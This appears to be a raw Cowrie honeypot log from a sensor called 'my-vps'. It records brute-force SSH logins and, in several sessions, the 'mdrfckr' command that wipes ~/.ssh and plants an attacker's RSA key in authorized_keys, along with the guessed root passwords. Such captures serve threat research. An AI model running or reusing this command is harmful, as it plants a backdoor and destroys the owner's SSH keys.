{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.425308Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.428271Z","src_ip":"152.32.129.236","session":"def9ff625420"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.467263Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.468027Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.631645Z","src_ip":"152.32.129.236","session":"def9ff625420"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.687567Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.session.closed","duration":13.650232791900635,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:36.096183Z","src_ip":"212.227.125.160","session":"05158c07d469"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":50390,"dst_ip":"1.2.3.4","dst_port":22,"session":"6024acb727c2","protocol":"ssh","message":"New connection: 51.250.72.176:50390 (1.2.3.4:22) [session: 6024acb727c2]","sensor":"my-vps","timestamp":"2025-09-09T00:56:39.511036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:39.512122Z","src_ip":"51.250.72.176","session":"6024acb727c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:39.550682Z","src_ip":"51.250.72.176","session":"6024acb727c2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:56:39.743038Z","src_ip":"51.250.72.176","session":"6024acb727c2"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:39.782444Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:39.783805Z","src_ip":"51.250.72.176","session":"6024acb727c2"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":59368,"dst_ip":"1.2.3.4","dst_port":22,"session":"169caa76c639","protocol":"ssh","message":"New connection: 103.100.209.195:59368 (1.2.3.4:22) [session: 169caa76c639]","sensor":"my-vps","timestamp":"2025-09-09T00:56:45.752451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:45.762242Z","src_ip":"103.100.209.195","session":"169caa76c639"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:45.962997Z","src_ip":"103.100.209.195","session":"169caa76c639"}
{"eventid":"cowrie.login.failed","username":"zookeeper","password":"2025","message":"login attempt [zookeeper/2025] failed","sensor":"my-vps","timestamp":"2025-09-09T00:56:46.782023Z","src_ip":"103.100.209.195","session":"169caa76c639"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:47.992761Z","src_ip":"103.100.209.195","session":"169caa76c639"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58596,"dst_ip":"1.2.3.4","dst_port":23,"session":"cbacfe5974bf","protocol":"telnet","message":"New connection: 212.227.125.160:58596 (1.2.3.4:23) [session: cbacfe5974bf]","sensor":"my-vps","timestamp":"2025-09-09T00:57:05.491719Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":44060,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bdd45f6438f","protocol":"ssh","message":"New connection: 43.156.132.147:44060 (1.2.3.4:22) [session: 6bdd45f6438f]","sensor":"my-vps","timestamp":"2025-09-09T00:57:19.963228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:19.964061Z","src_ip":"43.156.132.147","session":"6bdd45f6438f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:20.209377Z","src_ip":"43.156.132.147","session":"6bdd45f6438f"}
{"eventid":"cowrie.login.failed","username":"public","password":"12345","message":"login attempt [public/12345] failed","sensor":"my-vps","timestamp":"2025-09-09T00:57:21.224818Z","src_ip":"43.156.132.147","session":"6bdd45f6438f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:22.470770Z","src_ip":"43.156.132.147","session":"6bdd45f6438f"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":48520,"dst_ip":"1.2.3.4","dst_port":22,"session":"551a0042c2cf","protocol":"ssh","message":"New connection: 5.202.105.236:48520 (1.2.3.4:22) [session: 551a0042c2cf]","sensor":"my-vps","timestamp":"2025-09-09T00:57:29.390558Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:29.407164Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:29.550171Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:57:30.134152Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:57:30.492606Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:57:30.493365Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:57:30.494854Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:30.643563Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:57:30.962103Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:57:30.962909Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:57:31.113625Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:31.114582Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.session.closed","duration":30.62041425704956,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:36.112070Z","src_ip":"212.227.125.160","session":"cbacfe5974bf"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":50658,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a171eac0dfc","protocol":"ssh","message":"New connection: 5.202.105.236:50658 (1.2.3.4:22) [session: 8a171eac0dfc]","sensor":"my-vps","timestamp":"2025-09-09T00:57:40.313611Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:40.329253Z","src_ip":"5.202.105.236","session":"8a171eac0dfc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:40.472471Z","src_ip":"5.202.105.236","session":"8a171eac0dfc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:57:41.116914Z","src_ip":"5.202.105.236","session":"8a171eac0dfc"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:41.253669Z","src_ip":"5.202.105.236","session":"551a0042c2cf"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:41.277686Z","src_ip":"5.202.105.236","session":"8a171eac0dfc"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":35492,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd7f92ae738f","protocol":"ssh","message":"New connection: 152.32.129.236:35492 (1.2.3.4:22) [session: fd7f92ae738f]","sensor":"my-vps","timestamp":"2025-09-09T00:57:45.525166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:57:45.525941Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:57:45.723716Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.login.success","username":"root","password":"ABcd@1234","message":"login attempt [root/ABcd@1234] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:57:46.556680Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:57:47.004608Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:57:47.005355Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:57:47.006441Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:57:47.205977Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:57:47.617984Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:57:47.618708Z","src_ip":"152.32.129.236","session":"fd7f92ae738f"}
